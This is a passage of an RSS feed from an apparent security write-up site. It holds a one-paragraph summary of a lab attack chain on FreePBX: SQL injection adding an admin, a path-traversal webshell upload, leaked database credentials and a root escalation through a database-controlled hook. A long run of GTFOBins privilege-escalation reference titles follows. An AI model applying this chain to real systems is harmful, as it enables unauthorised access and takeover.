&lt;p&gt;Zigbee is an IEEE 802.15.4-based, wireless networking standard, which is used for two-way communication between sensors and control systems. Zigbee is a short-range wireless communication standard like Bluetooth and Wi-Fi while covering a range of 10 to 100 meters.&lt;/p&gt;</description></item><item><title>Connected</title><link>https://bokkapig.pages.dev/writeups/connected/</link><pubDate>Sat, 06 Jun 2026 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/connected/</guid><description>An unauthenticated stacked SQL injection in the FreePBX 16 endpoint module (CVE-2025-57819) inserts a full-access administrator directly into the ampusers table, and the Endpoint Manager firmware uploader (CVE-2025-61678) is then abused with a path traversal to drop a PHP webshell, yielding code execution as asterisk and the user flag. FreePBX config files leak the MariaDB credentials in plaintext, granting write access to the asterisk database. The root-run synologyabb sysadmin hook execs a DB-controlled CLI path, so repointing the SYNOLOGYABFBABBCLI setting at an attacker script and firing the incron trigger runs it as root.</description></item><item><title>7z</title><link>https://bokkapig.pages.dev/refs/gtfobins/7z/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/7z/</guid><description/></item><item><title>aa-exec</title><link>https://bokkapig.pages.dev/refs/gtfobins/aa-exec/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/aa-exec/</guid><description/></item><item><title>ab</title><link>https://bokkapig.pages.dev/refs/gtfobins/ab/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ab/</guid><description/></item><item><title>acr</title><link>https://bokkapig.pages.dev/refs/gtfobins/acr/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/acr/</guid><description/></item><item><title>agetty</title><link>https://bokkapig.pages.dev/refs/gtfobins/agetty/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/agetty/</guid><description/></item><item><title>alpine</title><link>https://bokkapig.pages.dev/refs/gtfobins/alpine/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/alpine/</guid><description/></item><item><title>ansible-playbook</title><link>https://bokkapig.pages.dev/refs/gtfobins/ansible-playbook/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ansible-playbook/</guid><description/></item><item><title>ansible-test</title><link>https://bokkapig.pages.dev/refs/gtfobins/ansible-test/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ansible-test/</guid><description/></item><item><title>aoss</title><link>https://bokkapig.pages.dev/refs/gtfobins/aoss/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/aoss/</guid><description/></item><item><title>apache2</title><link>https://bokkapig.pages.dev/refs/gtfobins/apache2/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/apache2/</guid><description/></item><item><title>apache2ctl</title><link>https://bokkapig.pages.dev/refs/gtfobins/apache2ctl/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/apache2ctl/</guid><description/></item><item><title>apport-cli</title><link>https://bokkapig.pages.dev/refs/gtfobins/apport-cli/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/apport-cli/</guid><description/></item><item><title>apt</title><link>https://bokkapig.pages.dev/refs/gtfobins/apt/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/apt/</guid><description/></item><item><title>apt-get</title><link>https://bokkapig.pages.dev/refs/gtfobins/apt-get/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/apt-get/</guid><description/></item><item><title>aptitude</title><link>https://bokkapig.pages.dev/refs/gtfobins/aptitude/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/aptitude/</guid><description/></item><item><title>ar</title><link>https://bokkapig.pages.dev/refs/gtfobins/ar/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ar/</guid><description/></item><item><title>arch-nspawn</title><link>https://bokkapig.pages.dev/refs/gtfobins/arch-nspawn/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/arch-nspawn/</guid><description/></item><item><title>aria2c</title><link>https://bokkapig.pages.dev/refs/gtfobins/aria2c/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/aria2c/</guid><description/></item><item><title>arj</title><link>https://bokkapig.pages.dev/refs/gtfobins/arj/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/arj/</guid><description/></item><item><title>arp</title><link>https://bokkapig.pages.dev/refs/gtfobins/arp/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/arp/</guid><description/></item><item><title>as</title><link>https://bokkapig.pages.dev/refs/gtfobins/as/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/as/</guid><description/></item><item><title>ascii-xfr</title><link>https://bokkapig.pages.dev/refs/gtfobins/ascii-xfr/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ascii-xfr/</guid><description/></item><item><title>ascii85</title><link>https://bokkapig.pages.dev/refs/gtfobins/ascii85/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ascii85/</guid><description/></item><item><title>ash</title><link>https://bokkapig.pages.dev/refs/gtfobins/ash/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ash/</guid><description/></item><item><title>aspell</title><link>https://bokkapig.pages.dev/refs/gtfobins/aspell/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/aspell/</guid><description/></item><item><title>asterisk</title><link>https://bokkapig.pages.dev/refs/gtfobins/asterisk/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/asterisk/</guid><description/></item><item><title>at</title><link>https://bokkapig.pages.dev/refs/gtfobins/at/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/at/</guid><description/></item><item><title>atobm</title><link>https://bokkapig.pages.dev/refs/gtfobins/atobm/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/atobm/</guid><description/></item><item><title>autoconf</title><link>https://bokkapig.pages.dev/refs/gtfobins/autoconf/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/autoconf/</guid><description/></item><item><title>autoheader</title><link>https://bokkapig.pages.dev/refs/gtfobins/autoheader/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/autoheader/</guid><description/></item><item><title>autoreconf</title><link>https://bokkapig.pages.dev/refs/gtfobins/autoreconf/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/autoreconf/</guid><description/></item><item><title>awk</title><link>https://bokkapig.pages.dev/refs/gtfobins/awk/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/awk/</guid><description/></item><item><title>aws</title><link>https://bokkapig.pages.dev/refs/gtfobins/aws/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/aws/</guid><description/></item><item><title>base32</title><link>https://bokkapig.pages.dev/refs/gtfobins/base32/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/base32/</guid><description/></item><item><title>base58</title><link>https://bokkapig.pages.dev/refs/gtfobins/base58/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/base58/</guid><description/></item><item><title>base64</title><link>https://bokkapig.pages.dev/refs/gtfobins/base64/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/base64/</guid><description/></item><item><title>basenc</title><link>https://bokkapig.pages.dev/refs/gtfobins/basenc/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/basenc/</guid><description/></item><item><title>basez</title><link>https://bokkapig.pages.dev/refs/gtfobins/basez/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/basez/</guid><description/></item><item><title>bash</title><link>https://bokkapig.pages.dev/refs/gtfobins/bash/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/bash/</guid><description/></item><item><title>bashbug</title><link>https://bokkapig.pages.dev/refs/gtfobins/bashbug/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/bashbug/</guid><description/></item><item><title>batcat</title><link>https://bokkapig.pages.dev/refs/gtfobins/batcat/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/batcat/</guid><description/></item><item><title>bbot</title><link>https://bokkapig.pages.dev/refs/gtfobins/bbot/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/bbot/</guid><description/></item><item><title>bc</title><link>https://bokkapig.pages.dev/refs/gtfobins/bc/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/bc/</guid><description/></item><item><title>bconsole</title><link>https://bokkapig.pages.dev/refs/gtfobins/bconsole/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/bconsole/</guid><description/></item><item><title>bee</title><link>https://bokkapig.pages.dev/refs/gtfobins/bee/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/bee/</guid><description/></item><item><title>borg</title><link>https://bokkapig.pages.dev/refs/gtfobins/borg/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/borg/</guid><description/></item><item><title>bpftrace</title><link>https://bokkapig.pages.dev/refs/gtfobins/bpftrace/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/bpftrace/</guid><description/></item><item><title>bridge</title><link>https://bokkapig.pages.dev/refs/gtfobins/bridge/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/bridge/</guid><description/></item><item><title>bundle</title><link>https://bokkapig.pages.dev/refs/gtfobins/bundle/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/bundle/</guid><description/></item><item><title>bundler</title><link>https://bokkapig.pages.dev/refs/gtfobins/bundler/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/bundler/</guid><description/></item><item><title>busctl</title><link>https://bokkapig.pages.dev/refs/gtfobins/busctl/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/busctl/</guid><description/></item><item><title>busybox</title><link>https://bokkapig.pages.dev/refs/gtfobins/busybox/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/busybox/</guid><description/></item><item><title>byebug</title><link>https://bokkapig.pages.dev/refs/gtfobins/byebug/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/byebug/</guid><description/></item><item><title>bzip2</title><link>https://bokkapig.pages.dev/refs/gtfobins/bzip2/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/bzip2/</guid><description/></item><item><title>c89</title><link>https://bokkapig.pages.dev/refs/gtfobins/c89/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/c89/</guid><description/></item><item><title>c99</title><link>https://bokkapig.pages.dev/refs/gtfobins/c99/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/c99/</guid><description/></item><item><title>cabal</title><link>https://bokkapig.pages.dev/refs/gtfobins/cabal/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cabal/</guid><description/></item><item><title>cancel</title><link>https://bokkapig.pages.dev/refs/gtfobins/cancel/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cancel/</guid><description/></item><item><title>capsh</title><link>https://bokkapig.pages.dev/refs/gtfobins/capsh/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/capsh/</guid><description/></item><item><title>cargo</title><link>https://bokkapig.pages.dev/refs/gtfobins/cargo/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cargo/</guid><description/></item><item><title>cat</title><link>https://bokkapig.pages.dev/refs/gtfobins/cat/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cat/</guid><description/></item><item><title>cc</title><link>https://bokkapig.pages.dev/refs/gtfobins/cc/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cc/</guid><description/></item><item><title>cdist</title><link>https://bokkapig.pages.dev/refs/gtfobins/cdist/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cdist/</guid><description/></item><item><title>certbot</title><link>https://bokkapig.pages.dev/refs/gtfobins/certbot/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/certbot/</guid><description/></item><item><title>chattr</title><link>https://bokkapig.pages.dev/refs/gtfobins/chattr/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/chattr/</guid><description/></item><item><title>check_by_ssh</title><link>https://bokkapig.pages.dev/refs/gtfobins/check-by-ssh/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/check-by-ssh/</guid><description/></item><item><title>check_cups</title><link>https://bokkapig.pages.dev/refs/gtfobins/check-cups/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/check-cups/</guid><description/></item><item><title>check_log</title><link>https://bokkapig.pages.dev/refs/gtfobins/check-log/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/check-log/</guid><description/></item><item><title>check_memory</title><link>https://bokkapig.pages.dev/refs/gtfobins/check-memory/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/check-memory/</guid><description/></item><item><title>check_raid</title><link>https://bokkapig.pages.dev/refs/gtfobins/check-raid/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/check-raid/</guid><description/></item><item><title>check_ssl_cert</title><link>https://bokkapig.pages.dev/refs/gtfobins/check-ssl-cert/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/check-ssl-cert/</guid><description/></item><item><title>check_statusfile</title><link>https://bokkapig.pages.dev/refs/gtfobins/check-statusfile/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/check-statusfile/</guid><description/></item><item><title>chmod</title><link>https://bokkapig.pages.dev/refs/gtfobins/chmod/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/chmod/</guid><description/></item><item><title>choom</title><link>https://bokkapig.pages.dev/refs/gtfobins/choom/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/choom/</guid><description/></item><item><title>chown</title><link>https://bokkapig.pages.dev/refs/gtfobins/chown/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/chown/</guid><description/></item><item><title>chroot</title><link>https://bokkapig.pages.dev/refs/gtfobins/chroot/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/chroot/</guid><description/></item><item><title>chrt</title><link>https://bokkapig.pages.dev/refs/gtfobins/chrt/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/chrt/</guid><description/></item><item><title>clamscan</title><link>https://bokkapig.pages.dev/refs/gtfobins/clamscan/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/clamscan/</guid><description/></item><item><title>clisp</title><link>https://bokkapig.pages.dev/refs/gtfobins/clisp/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/clisp/</guid><description/></item><item><title>cmake</title><link>https://bokkapig.pages.dev/refs/gtfobins/cmake/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cmake/</guid><description/></item><item><title>cmp</title><link>https://bokkapig.pages.dev/refs/gtfobins/cmp/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cmp/</guid><description/></item><item><title>cobc</title><link>https://bokkapig.pages.dev/refs/gtfobins/cobc/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cobc/</guid><description/></item><item><title>code</title><link>https://bokkapig.pages.dev/refs/gtfobins/code/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/code/</guid><description/></item><item><title>codex</title><link>https://bokkapig.pages.dev/refs/gtfobins/codex/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/codex/</guid><description/></item><item><title>column</title><link>https://bokkapig.pages.dev/refs/gtfobins/column/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/column/</guid><description/></item><item><title>comm</title><link>https://bokkapig.pages.dev/refs/gtfobins/comm/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/comm/</guid><description/></item><item><title>composer</title><link>https://bokkapig.pages.dev/refs/gtfobins/composer/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/composer/</guid><description/></item><item><title>cowsay</title><link>https://bokkapig.pages.dev/refs/gtfobins/cowsay/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cowsay/</guid><description/></item><item><title>cowthink</title><link>https://bokkapig.pages.dev/refs/gtfobins/cowthink/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cowthink/</guid><description/></item><item><title>cp</title><link>https://bokkapig.pages.dev/refs/gtfobins/cp/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cp/</guid><description/></item><item><title>cpan</title><link>https://bokkapig.pages.dev/refs/gtfobins/cpan/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cpan/</guid><description/></item><item><title>cpio</title><link>https://bokkapig.pages.dev/refs/gtfobins/cpio/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cpio/</guid><description/></item><item><title>cpulimit</title><link>https://bokkapig.pages.dev/refs/gtfobins/cpulimit/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cpulimit/</guid><description/></item><item><title>crash</title><link>https://bokkapig.pages.dev/refs/gtfobins/crash/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/crash/</guid><description/></item><item><title>crontab</title><link>https://bokkapig.pages.dev/refs/gtfobins/crontab/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/crontab/</guid><description/></item><item><title>csh</title><link>https://bokkapig.pages.dev/refs/gtfobins/csh/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/csh/</guid><description/></item><item><title>csplit</title><link>https://bokkapig.pages.dev/refs/gtfobins/csplit/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/csplit/</guid><description/></item><item><title>csvtool</title><link>https://bokkapig.pages.dev/refs/gtfobins/csvtool/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/csvtool/</guid><description/></item><item><title>ctr</title><link>https://bokkapig.pages.dev/refs/gtfobins/ctr/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ctr/</guid><description/></item><item><title>cupsfilter</title><link>https://bokkapig.pages.dev/refs/gtfobins/cupsfilter/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cupsfilter/</guid><description/></item><item><title>curl</title><link>https://bokkapig.pages.dev/refs/gtfobins/curl/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/curl/</guid><description/></item><item><title>cut</title><link>https://bokkapig.pages.dev/refs/gtfobins/cut/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/cut/</guid><description/></item><item><title>dash</title><link>https://bokkapig.pages.dev/refs/gtfobins/dash/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dash/</guid><description/></item><item><title>date</title><link>https://bokkapig.pages.dev/refs/gtfobins/date/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/date/</guid><description/></item><item><title>dc</title><link>https://bokkapig.pages.dev/refs/gtfobins/dc/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dc/</guid><description/></item><item><title>dd</title><link>https://bokkapig.pages.dev/refs/gtfobins/dd/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dd/</guid><description/></item><item><title>debugfs</title><link>https://bokkapig.pages.dev/refs/gtfobins/debugfs/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/debugfs/</guid><description/></item><item><title>dhclient</title><link>https://bokkapig.pages.dev/refs/gtfobins/dhclient/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dhclient/</guid><description/></item><item><title>dialog</title><link>https://bokkapig.pages.dev/refs/gtfobins/dialog/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dialog/</guid><description/></item><item><title>diff</title><link>https://bokkapig.pages.dev/refs/gtfobins/diff/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/diff/</guid><description/></item><item><title>dig</title><link>https://bokkapig.pages.dev/refs/gtfobins/dig/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dig/</guid><description/></item><item><title>distcc</title><link>https://bokkapig.pages.dev/refs/gtfobins/distcc/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/distcc/</guid><description/></item><item><title>dmesg</title><link>https://bokkapig.pages.dev/refs/gtfobins/dmesg/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dmesg/</guid><description/></item><item><title>dmidecode</title><link>https://bokkapig.pages.dev/refs/gtfobins/dmidecode/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dmidecode/</guid><description/></item><item><title>dmsetup</title><link>https://bokkapig.pages.dev/refs/gtfobins/dmsetup/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dmsetup/</guid><description/></item><item><title>dnf</title><link>https://bokkapig.pages.dev/refs/gtfobins/dnf/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dnf/</guid><description/></item><item><title>dnsmasq</title><link>https://bokkapig.pages.dev/refs/gtfobins/dnsmasq/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dnsmasq/</guid><description/></item><item><title>doas</title><link>https://bokkapig.pages.dev/refs/gtfobins/doas/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/doas/</guid><description/></item><item><title>docker</title><link>https://bokkapig.pages.dev/refs/gtfobins/docker/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/docker/</guid><description/></item><item><title>dos2unix</title><link>https://bokkapig.pages.dev/refs/gtfobins/dos2unix/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dos2unix/</guid><description/></item><item><title>dosbox</title><link>https://bokkapig.pages.dev/refs/gtfobins/dosbox/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dosbox/</guid><description/></item><item><title>dotnet</title><link>https://bokkapig.pages.dev/refs/gtfobins/dotnet/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dotnet/</guid><description/></item><item><title>dpkg</title><link>https://bokkapig.pages.dev/refs/gtfobins/dpkg/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dpkg/</guid><description/></item><item><title>dstat</title><link>https://bokkapig.pages.dev/refs/gtfobins/dstat/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dstat/</guid><description/></item><item><title>dvips</title><link>https://bokkapig.pages.dev/refs/gtfobins/dvips/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/dvips/</guid><description/></item><item><title>easy_install</title><link>https://bokkapig.pages.dev/refs/gtfobins/easy-install/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/easy-install/</guid><description/></item><item><title>easyrsa</title><link>https://bokkapig.pages.dev/refs/gtfobins/easyrsa/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/easyrsa/</guid><description/></item><item><title>eb</title><link>https://bokkapig.pages.dev/refs/gtfobins/eb/</link><pubDate>Wed, 27 May 2026 14:01:45 